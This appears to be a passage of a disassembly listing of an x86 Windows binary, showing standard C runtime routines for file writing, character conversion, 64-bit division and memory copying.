sub_40CE5A proc near ; CODE XREF: sub_40D420+9A�p
; sub_4105A7+BB�p
var_594 = dword ptr -594h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_588 = dword ptr -588h
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_56D = byte ptr -56Dh
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = byte ptr -564h
var_410 = byte ptr -410h
var_160 = byte ptr -160h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-518h]
sub esp, 594h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+518h+var_4], eax
mov eax, [ebp+518h+arg_4]
push esi
xor esi, esi
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_57C], eax
mov [ebp+518h+var_578], esi
mov [ebp+518h+var_580], esi
jnz short loc_40CE96
xor eax, eax
jmp loc_40D40A
; ---------------------------------------------------------------------------
loc_40CE96: ; CODE XREF: sub_40CE5A+33�j
cmp eax, esi
jnz short loc_40CEC1
call sub_4057E6
mov [eax], esi
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_40D40A
; ---------------------------------------------------------------------------
loc_40CEC1: ; CODE XREF: sub_40CE5A+3E�j
mov esi, [ebp+518h+arg_0]
push ebx
mov ebx, esi
and ebx, 1Fh
imul ebx, 28h
mov eax, esi
sar eax, 5
push edi
lea edi, ds:433CA0h[eax*4]
mov eax, [edi]
add eax, ebx
mov cl, [eax+24h]
add cl, cl
sar cl, 1
cmp cl, 2
mov [ebp+518h+var_588], edi
mov [ebp+518h+var_56D], cl
jz short loc_40CEF8
cmp cl, 1
jnz short loc_40CF2B
loc_40CEF8: ; CODE XREF: sub_40CE5A+97�j
mov ecx, [ebp+518h+arg_8]
not ecx
test cl, 1
jnz short loc_40CF2B
call sub_4057E6
xor esi, esi
mov [eax], esi
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
jmp loc_40D400
; ---------------------------------------------------------------------------
loc_40CF2B: ; CODE XREF: sub_40CE5A+9C�j
; sub_40CE5A+A9�j
test byte ptr [eax+4], 20h
jz short loc_40CF40
push 2
push 0
push 0
push esi
call sub_40CCBE
add esp, 10h
loc_40CF40: ; CODE XREF: sub_40CE5A+D5�j
push esi
call sub_40D540
test eax, eax
pop ecx
jz loc_40D145
mov eax, [edi]
test byte ptr [ebx+eax+4], 80h
jz loc_40D145
call sub_40539D
mov eax, [eax+6Ch]
xor ecx, ecx
cmp [eax+14h], ecx
lea eax, [ebp+518h+var_594]
setz cl
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
mov esi, ecx
call ds:dword_41D118
test eax, eax
jz loc_40D145
test esi, esi
jz short loc_40CF93
cmp [ebp+518h+var_56D], 0
jz loc_40D145
loc_40CF93: ; CODE XREF: sub_40CE5A+12D�j
call ds:dword_41D11C
and [ebp+518h+var_568], 0
cmp [ebp+518h+arg_8], 0
mov esi, [ebp+518h+var_57C]
mov [ebp+518h+var_594], eax
mov [ebp+518h+var_58C], esi
jbe loc_40D3B2
and [ebp+518h+var_574], 0
jmp short loc_40CFBC
; ---------------------------------------------------------------------------
loc_40CFB9: ; CODE XREF: sub_40CE5A+2E0�j
mov esi, [ebp+518h+var_58C]
loc_40CFBC: ; CODE XREF: sub_40CE5A+15D�j
mov al, [ebp+518h+var_56D]
test al, al
jnz loc_40D0CD
mov al, [esi]
xor ecx, ecx
cmp al, 0Ah
setz cl
movsx eax, al
push eax
mov [ebp+518h+var_590], ecx
call sub_40CA36
test eax, eax
pop ecx
jnz short loc_40CFFB
push 1
lea eax, [ebp+518h+var_56C]
push esi
push eax
call sub_40F4D0
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40D3A8
jmp short loc_40D02B
; ---------------------------------------------------------------------------
loc_40CFFB: ; CODE XREF: sub_40CE5A+185�j
mov eax, [ebp+518h+var_57C]
sub eax, esi
add eax, [ebp+518h+arg_8]
cmp eax, 1
jbe loc_40D3A8
push 2
lea eax, [ebp+518h+var_56C]
push esi
push eax
call sub_40F4D0
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40D3A8
inc esi
inc [ebp+518h+var_574]
loc_40D02B: ; CODE XREF: sub_40CE5A+19F�j
xor eax, eax
push eax
push eax
push 5
lea ecx, [ebp+518h+var_C]
push ecx
push 1
lea ecx, [ebp+518h+var_56C]
push ecx
push eax
push [ebp+518h+var_594]
inc esi
inc [ebp+518h+var_574]
mov [ebp+518h+var_58C], esi
call ds:dword_41D138
mov esi, eax
test esi, esi
jz loc_40D3A8
push 0
lea eax, [ebp+518h+var_568]
push eax
push esi
lea eax, [ebp+518h+var_C]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz loc_40D39F
mov eax, [ebp+518h+var_568]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D3A8
cmp [ebp+518h+var_590], 0
jz loc_40D131
push 0
lea eax, [ebp+518h+var_568]
push eax
push 1
lea eax, [ebp+518h+var_C]
push eax
mov eax, [edi]
mov [ebp+518h+var_C], 0Dh
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz loc_40D39F
cmp [ebp+518h+var_568], 1
jl loc_40D3A8
inc [ebp+518h+var_580]
inc [ebp+518h+var_578]
jmp short loc_40D131
; ---------------------------------------------------------------------------
loc_40D0CD: ; CODE XREF: sub_40CE5A+167�j
cmp al, 1
jz short loc_40D0D5
cmp al, 2
jnz short loc_40D0F0
loc_40D0D5: ; CODE XREF: sub_40CE5A+275�j
movzx ecx, word ptr [esi]
xor edx, edx
cmp cx, 0Ah
setz dl
inc esi
inc esi
add [ebp+518h+var_574], 2
mov [ebp+518h+var_56C], ecx
mov [ebp+518h+var_58C], esi
mov [ebp+518h+var_590], edx
loc_40D0F0: ; CODE XREF: sub_40CE5A+279�j
cmp al, 1
jz short loc_40D0F8
cmp al, 2
jnz short loc_40D131
loc_40D0F8: ; CODE XREF: sub_40CE5A+298�j
push [ebp+518h+var_56C]
call sub_4104DC
cmp ax, word ptr [ebp+518h+var_56C]
pop ecx
jnz loc_40D39F
inc [ebp+518h+var_578]
cmp [ebp+518h+var_590], 0
jz short loc_40D131
push 0Dh
pop eax
push eax
mov [ebp+518h+var_56C], eax
call sub_4104DC
cmp ax, word ptr [ebp+518h+var_56C]
pop ecx
jnz loc_40D39F
inc [ebp+518h+var_578]
inc [ebp+518h+var_580]
loc_40D131: ; CODE XREF: sub_40CE5A+232�j
; sub_40CE5A+271�j ...
mov eax, [ebp+518h+arg_8]
cmp [ebp+518h+var_574], eax
jb loc_40CFB9
jmp loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D145: ; CODE XREF: sub_40CE5A+EF�j
; sub_40CE5A+FC�j ...
mov eax, [edi]
add eax, ebx
test byte ptr [eax+4], 80h
jz loc_40D378
mov eax, [ebp+518h+var_57C]
xor esi, esi
cmp [ebp+518h+var_56D], 0
mov [ebp+518h+var_56C], esi
jnz loc_40D1F6
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_568], eax
jbe loc_40D3D9
loc_40D174: ; CODE XREF: sub_40CE5A+395�j
mov ecx, [ebp+518h+var_568]
and [ebp+518h+var_574], 0
sub ecx, [ebp+518h+var_57C]
lea eax, [ebp+518h+var_564]
loc_40D181: ; CODE XREF: sub_40CE5A+354�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D1B0
mov edx, [ebp+518h+var_568]
inc [ebp+518h+var_568]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_40D1A1
inc [ebp+518h+var_580]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+518h+var_574]
loc_40D1A1: ; CODE XREF: sub_40CE5A+33B�j
mov [eax], dl
inc eax
inc [ebp+518h+var_574]
cmp [ebp+518h+var_574], 400h
jb short loc_40D181
loc_40D1B0: ; CODE XREF: sub_40CE5A+32D�j
mov esi, eax
lea eax, [ebp+518h+var_564]
sub esi, eax
push 0
lea eax, [ebp+518h+var_584]
push eax
push esi
lea eax, [ebp+518h+var_564]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz loc_40D39F
mov eax, [ebp+518h+var_584]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D3A8
mov eax, [ebp+518h+var_568]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
jb short loc_40D174
jmp loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D1F6: ; CODE XREF: sub_40CE5A+305�j
cmp [ebp+518h+var_56D], 2
jnz loc_40D29D
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_568], eax
jbe loc_40D3D9
loc_40D20F: ; CODE XREF: sub_40CE5A+438�j
mov ecx, [ebp+518h+var_568]
xor esi, esi
sub ecx, [ebp+518h+var_57C]
lea eax, [ebp+518h+var_564]
loc_40D21A: ; CODE XREF: sub_40CE5A+3F7�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D253
mov edx, [ebp+518h+var_568]
add [ebp+518h+var_568], 2
movzx edx, word ptr [edx]
inc ecx
inc ecx
cmp dx, 0Ah
jnz short loc_40D241
add [ebp+518h+var_580], 2
mov word ptr [eax], 0Dh
inc eax
inc eax
inc esi
inc esi
loc_40D241: ; CODE XREF: sub_40CE5A+3D8�j
mov edi, [ebp+518h+var_588]
mov [eax], dx
inc eax
inc eax
inc esi
inc esi
cmp esi, 3FFh
jb short loc_40D21A
loc_40D253: ; CODE XREF: sub_40CE5A+3C6�j
mov esi, eax
lea eax, [ebp+518h+var_564]
sub esi, eax
push 0
lea eax, [ebp+518h+var_584]
push eax
push esi
lea eax, [ebp+518h+var_564]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz loc_40D39F
mov eax, [ebp+518h+var_584]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D3A8
mov eax, [ebp+518h+var_568]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
jb loc_40D20F
jmp loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D29D: ; CODE XREF: sub_40CE5A+3A0�j
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_574], eax
jbe loc_40D3D9
loc_40D2AC: ; CODE XREF: sub_40CE5A+516�j
mov ecx, [ebp+518h+var_574]
and [ebp+518h+var_568], 0
sub ecx, [ebp+518h+var_57C]
push 2
lea eax, [ebp+518h+var_160]
pop esi
loc_40D2BF: ; CODE XREF: sub_40CE5A+497�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D2F3
mov edx, [ebp+518h+var_574]
movzx edx, word ptr [edx]
add [ebp+518h+var_574], esi
add ecx, esi
cmp dx, 0Ah
jnz short loc_40D2E2
mov word ptr [eax], 0Dh
add eax, esi
add [ebp+518h+var_568], esi
loc_40D2E2: ; CODE XREF: sub_40CE5A+47C�j
add [ebp+518h+var_568], esi
mov [eax], dx
add eax, esi
cmp [ebp+518h+var_568], 152h
jb short loc_40D2BF
loc_40D2F3: ; CODE XREF: sub_40CE5A+46B�j
xor esi, esi
push esi
push esi
push 2ABh
lea ecx, [ebp+518h+var_410]
push ecx
lea ecx, [ebp+518h+var_160]
sub eax, ecx
cdq
sub eax, edx
sar eax, 1
push eax
mov eax, ecx
push eax
push esi
push 0FDE9h
call ds:dword_41D138
mov edi, eax
cmp edi, esi
jz short loc_40D39F
loc_40D326: ; CODE XREF: sub_40CE5A+4F6�j
push 0
lea eax, [ebp+518h+var_584]
push eax
mov eax, edi
sub eax, esi
push eax
lea eax, [ebp+esi+518h+var_410]
push eax
mov eax, [ebp+518h+var_588]
mov eax, [eax]
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz short loc_40D354
add esi, [ebp+518h+var_584]
cmp edi, esi
jg short loc_40D326
jmp short loc_40D35D
; ---------------------------------------------------------------------------
loc_40D354: ; CODE XREF: sub_40CE5A+4EF�j
call ds:dword_41D0F0
mov [ebp+518h+var_56C], eax
loc_40D35D: ; CODE XREF: sub_40CE5A+4F8�j
cmp edi, esi
jg short loc_40D3A8
mov eax, [ebp+518h+var_574]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
mov [ebp+518h+var_578], eax
jb loc_40D2AC
jmp short loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D378: ; CODE XREF: sub_40CE5A+2F3�j
push 0
lea ecx, [ebp+518h+var_584]
push ecx
push [ebp+518h+arg_8]
push [ebp+518h+var_57C]
push dword ptr [eax]
call ds:dword_41D088
test eax, eax
jz short loc_40D39F
mov eax, [ebp+518h+var_584]
and [ebp+518h+var_56C], 0
mov [ebp+518h+var_578], eax
jmp short loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D39F: ; CODE XREF: sub_40CE5A+21A�j
; sub_40CE5A+25B�j ...
call ds:dword_41D0F0
mov [ebp+518h+var_56C], eax
loc_40D3A8: ; CODE XREF: sub_40CE5A+199�j
; sub_40CE5A+1AF�j ...
mov eax, [ebp+518h+var_578]
test eax, eax
jnz short loc_40D405
mov edi, [ebp+518h+var_588]
loc_40D3B2: ; CODE XREF: sub_40CE5A+153�j
xor esi, esi
cmp [ebp+518h+var_56C], esi
jz short loc_40D3D9
push 5
pop esi
cmp [ebp+518h+var_56C], esi
jnz short loc_40D3CE
call sub_4057D3
mov dword ptr [eax], 9
jmp short loc_40D3F9
; ---------------------------------------------------------------------------
loc_40D3CE: ; CODE XREF: sub_40CE5A+565�j
push [ebp+518h+var_56C]
call sub_4057F9
pop ecx
jmp short loc_40D400
; ---------------------------------------------------------------------------
loc_40D3D9: ; CODE XREF: sub_40CE5A+314�j
; sub_40CE5A+3AF�j ...
mov eax, [edi]
test byte ptr [ebx+eax+4], 40h
jz short loc_40D3EE
mov eax, [ebp+518h+var_57C]
cmp byte ptr [eax], 1Ah
jnz short loc_40D3EE
xor eax, eax
jmp short loc_40D408
; ---------------------------------------------------------------------------
loc_40D3EE: ; CODE XREF: sub_40CE5A+586�j
; sub_40CE5A+58E�j
call sub_4057D3
mov dword ptr [eax], 1Ch
loc_40D3F9: ; CODE XREF: sub_40CE5A+572�j
call sub_4057E6
mov [eax], esi
loc_40D400: ; CODE XREF: sub_40CE5A+CC�j
; sub_40CE5A+57D�j
or eax, 0FFFFFFFFh
jmp short loc_40D408
; ---------------------------------------------------------------------------
loc_40D405: ; CODE XREF: sub_40CE5A+553�j
sub eax, [ebp+518h+var_580]
loc_40D408: ; CODE XREF: sub_40CE5A+592�j
; sub_40CE5A+5A9�j
pop edi
pop ebx
loc_40D40A: ; CODE XREF: sub_40CE5A+37�j
; sub_40CE5A+62�j
mov ecx, [ebp+518h+var_4]
xor ecx, ebp
pop esi
call sub_402710
add ebp, 518h
leave
retn
sub_40CE5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D420 proc near ; CODE XREF: sub_4067D6+CB�p
; sub_4067D6+13A�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset dword_4217C0
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40D44F
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_40D447: ; CODE XREF: sub_40D420+5C�j
or eax, 0FFFFFFFFh
jmp loc_40D4EC
; ---------------------------------------------------------------------------
loc_40D44F: ; CODE XREF: sub_40D420+12�j
xor edi, edi
cmp eax, edi
jl short loc_40D45D
cmp eax, ds:dword_433C84
jb short loc_40D47E
loc_40D45D: ; CODE XREF: sub_40D420+33�j
; sub_40D420+7C�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_40D447
; ---------------------------------------------------------------------------
loc_40D47E: ; CODE XREF: sub_40D420+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40D45D
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40D4C7
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CE5A
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40D4DD
; ---------------------------------------------------------------------------
loc_40D4C7: ; CODE XREF: sub_40D420+8F�j
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40D4DD: ; CODE XREF: sub_40D420+A5�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40D4F2
mov eax, [ebp+var_1C]
loc_40D4EC: ; CODE XREF: sub_40D420+2A�j
call __SEH_epilog4
retn
sub_40D420 endp
; =============== S U B R O U T I N E =======================================
sub_40D4F2 proc near ; CODE XREF: sub_40D420+C4�p
; DATA XREF: .kSjx934:004217D8�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40D4F2 endp
; =============== S U B R O U T I N E =======================================
sub_40D4FC proc near ; CODE XREF: sub_4067D6+9C�p
; sub_409C8D+58�p ...
arg_0 = dword ptr 4
inc ds:dword_425FC8
push 1000h
call sub_40773A
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_40D525
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_40D536
; ---------------------------------------------------------------------------
loc_40D525: ; CODE XREF: sub_40D4FC+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_40D536: ; CODE XREF: sub_40D4FC+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_40D4FC endp
; =============== S U B R O U T I N E =======================================
sub_40D540 proc near ; CODE XREF: sub_4067D6+91�p
; sub_40871B+C�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40D557
call sub_4057D3
mov dword ptr [eax], 9
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40D557: ; CODE XREF: sub_40D540+7�j
push esi
xor esi, esi
cmp eax, esi
jl short loc_40D566
cmp eax, ds:dword_433C84
jb short loc_40D582
loc_40D566: ; CODE XREF: sub_40D540+1C�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 9
call sub_402F39
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40D582: ; CODE XREF: sub_40D540+24�j
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
movzx eax, byte ptr [ecx+eax+4]
and eax, 40h
pop esi
retn
sub_40D540 endp
; =============== S U B R O U T I N E =======================================
sub_40D59E proc near ; CODE XREF: sub_407979:loc_40799C�p
push esi
push edi
xor edi, edi
loc_40D5A2: ; CODE XREF: sub_40D59E+1A�j
lea esi, off_423F80[edi]
push dword ptr [esi]
call sub_405127
add edi, 4
cmp edi, 28h
pop ecx
mov [esi], eax
jb short loc_40D5A2
pop edi
pop esi
retn
sub_40D59E endp
; =============== S U B R O U T I N E =======================================
sub_40D5BD proc near ; CODE XREF: sub_4069D7+554�p
mov eax, ds:dword_423064
or eax, 1
xor ecx, ecx
cmp ds:dword_426420, eax
setz cl
mov eax, ecx
retn
sub_40D5BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D5D3 proc near ; CODE XREF: sub_40D732+12�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = word ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
push edi
mov edi, [ebp+arg_8]
jnz short loc_40D5F9
cmp edi, ebx
jbe short loc_40D5F9
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D5F5
mov [eax], ebx
loc_40D5F5: ; CODE XREF: sub_40D5D3+1E�j
; sub_40D5D3+EC�j ...
xor eax, eax
jmp short loc_40D678
; ---------------------------------------------------------------------------
loc_40D5F9: ; CODE XREF: sub_40D5D3+13�j
; sub_40D5D3+17�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D603
or dword ptr [eax], 0FFFFFFFFh
loc_40D603: ; CODE XREF: sub_40D5D3+2B�j
cmp edi, 7FFFFFFFh
jbe short loc_40D626
call sub_4057D3
push 16h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
loc_40D622: ; CODE XREF: sub_40D5D3+CC�j
; sub_40D5D3+D5�j
mov eax, esi
jmp short loc_40D678
; ---------------------------------------------------------------------------
loc_40D626: ; CODE XREF: sub_40D5D3+36�j
push [ebp+arg_10]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz loc_40D6D1
mov ax, [ebp+arg_C]
cmp ax, 0FFh
jbe short loc_40D67D
cmp esi, ebx
jz short loc_40D65A
cmp edi, ebx
jbe short loc_40D65A
push edi
push ebx
push esi
call sub_407B70
add esp, 0Ch
loc_40D65A: ; CODE XREF: sub_40D5D3+76�j
; sub_40D5D3+7A�j ...
call sub_4057D3
mov dword ptr [eax], 2Ah
call sub_4057D3
cmp [ebp+var_4], bl
mov eax, [eax]
jz short loc_40D678
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40D678: ; CODE XREF: sub_40D5D3+24�j
; sub_40D5D3+51�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40D67D: ; CODE XREF: sub_40D5D3+72�j
cmp esi, ebx
jz short loc_40D6AF
cmp edi, ebx
ja short loc_40D6AD
loc_40D685: ; CODE XREF: sub_40D5D3+141�j
; sub_40D5D3+149�j ...
call sub_4057D3
push 22h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40D622
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
jmp loc_40D622
; ---------------------------------------------------------------------------
loc_40D6AD: ; CODE XREF: sub_40D5D3+B0�j
mov [esi], al
loc_40D6AF: ; CODE XREF: sub_40D5D3+AC�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D6BC
mov dword ptr [eax], 1
loc_40D6BC: ; CODE XREF: sub_40D5D3+E1�j
; sub_40D5D3+12A�j ...
cmp [ebp+var_4], bl
jz loc_40D5F5
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
jmp loc_40D5F5
; ---------------------------------------------------------------------------
loc_40D6D1: ; CODE XREF: sub_40D5D3+64�j
lea ecx, [ebp+arg_4]
push ecx
push ebx
push edi
push esi
push 1
lea ecx, [ebp+arg_C]
push ecx
push ebx
mov [ebp+arg_4], ebx
push dword ptr [eax+4]
call ds:dword_41D138
cmp eax, ebx
jz short loc_40D703
cmp [ebp+arg_4], ebx
jnz loc_40D65A
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_40D6BC
mov [ecx], eax
jmp short loc_40D6BC
; ---------------------------------------------------------------------------
loc_40D703: ; CODE XREF: sub_40D5D3+11A�j
call ds:dword_41D0F0
cmp eax, 7Ah
jnz loc_40D65A
cmp esi, ebx
jz loc_40D685
cmp edi, ebx
jbe loc_40D685
push edi
push ebx
push esi
call sub_407B70
add esp, 0Ch
jmp loc_40D685
sub_40D5D3 endp
; =============== S U B R O U T I N E =======================================
sub_40D732 proc near ; CODE XREF: sub_4069D7+487�p
; sub_4069D7+8B1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push 0
push [esp+4+arg_C]
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40D5D3
add esp, 14h
retn
sub_40D732 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D750 proc near ; CODE XREF: sub_4069D7+786�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_40D781
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_40D7C8
; ---------------------------------------------------------------------------
loc_40D781: ; CODE XREF: sub_40D750+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_40D78F: ; CODE XREF: sub_40D750+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40D78F
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_40D7BD
cmp edx, [esp+4+arg_4]
ja short loc_40D7BD
jb short loc_40D7C6
cmp eax, [esp+4+arg_0]
jbe short loc_40D7C6
loc_40D7BD: ; CODE XREF: sub_40D750+5D�j
; sub_40D750+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_40D7C6: ; CODE XREF: sub_40D750+65�j
; sub_40D750+6B�j
xor ebx, ebx
loc_40D7C8: ; CODE XREF: sub_40D750+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_40D750 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7E5 proc near ; CODE XREF: sub_40D86C+4D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], edi
mov [ebp+var_8], esi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
shr ecx, 7
jmp short loc_40D805
; ---------------------------------------------------------------------------
db 8Dh, 9Bh, 4 dup(0)
; ---------------------------------------------------------------------------
loc_40D805: ; CODE XREF: sub_40D7E5+18�j
; sub_40D7E5+7B�j
movdqa xmm0, oword ptr [esi]
movdqa xmm1, oword ptr [esi+10h]
movdqa xmm2, oword ptr [esi+20h]
movdqa xmm3, oword ptr [esi+30h]
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm1
movdqa oword ptr [edi+20h], xmm2
movdqa oword ptr [edi+30h], xmm3
movdqa xmm4, oword ptr [esi+40h]
movdqa xmm5, oword ptr [esi+50h]
movdqa xmm6, oword ptr [esi+60h]
movdqa xmm7, oword ptr [esi+70h]
movdqa oword ptr [edi+40h], xmm4
movdqa oword ptr [edi+50h], xmm5
movdqa oword ptr [edi+60h], xmm6
movdqa oword ptr [edi+70h], xmm7
lea esi, [esi+80h]
lea edi, [edi+80h]
dec ecx
jnz short loc_40D805
mov esi, [ebp+var_8]
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40D7E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D86C proc near ; CODE XREF: sub_407370+42�j
; sub_407BF0+42�j ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_C], edi
mov [ebp+var_8], esi
mov [ebp+var_4], ebx
mov ebx, [ebp+arg_4]
mov eax, ebx
cdq
mov ecx, eax
mov eax, [ebp+arg_0]
xor ecx, edx
sub ecx, edx
and ecx, 0Fh
xor ecx, edx
sub ecx, edx
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
mov edx, ecx
or edx, edi
jnz short loc_40D8EF
mov esi, [ebp+arg_8]
mov ecx, esi
and ecx, 7Fh
mov [ebp+var_18], ecx
cmp esi, ecx
jz short loc_40D8C7
sub esi, ecx
push esi
push ebx
push eax
call sub_40D7E5
add esp, 0Ch
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
loc_40D8C7: ; CODE XREF: sub_40D86C+46�j
test ecx, ecx
jz short loc_40D942
mov ebx, [ebp+arg_8]
mov edx, [ebp+arg_4]
